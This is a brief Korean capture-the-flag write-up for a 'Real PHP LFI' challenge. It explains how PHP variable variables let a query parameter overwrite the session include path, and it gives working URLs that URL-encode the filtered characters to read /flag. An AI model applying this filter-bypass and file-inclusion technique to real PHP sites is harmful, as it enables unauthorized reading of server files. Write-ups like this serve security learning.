[Web Hacking] Real PHP LFI

0x01 문제 설명

---

0x02 풀이 과정

첨부된 소스코드를 보면, index.php 에서 $_SERVER[’QUERY_STRING’] 을 통해 쿼리 정보를 받아오고, config.php 에서 문자 필터링을 진행한다. 마지막에는 include($_SESSION['include_path']) 로 nav.php 를 불러온다. 취약점은 index.php 에서 발생한다.

foreach($arr as $key=>$value){
    $$key = fuck_path_change_or_check($value);
}

$$ 는 php의 가변변수 선언 시 사용하는 구문이다. 여기서 $_SESSION[’include_path’] 을 덮는다면 원하는 로컬 파일을 불러올 수 있다.

GET 파라미터를 통해 공격을 수행하였다. GET 파라미터는 배열, 딕셔너리 또한 값으로 전달할 수 있다. 이를테면 아래와 같은 식이다.

abcd.com?array[a]=1&array[b]=2

array(
[a] => 1
[b] => 2
)

http://web.h4ckingga.me:10013?_SESSION[include_path]=/flag

필터링을 우회해야 한다. _ , SESSION 그리고 / 가 필터링 되고있어, URL encoding 하여 우회하였다.

http://web.h4ckingga.me:10013?%5f%53ESSION[include%5fpath]=%2fflag

---

0x03 결과 확인

• FLAG
• H4CGM{adsfasdfadsfadsfasdfasdf}

---

0x04 회고 및 참고 내용

복잡한 이해 없이 단순하게 생각하니 풀린 문제였다. 필터링에 관하여 차츰 정리해야겠다는 생각이 들었다.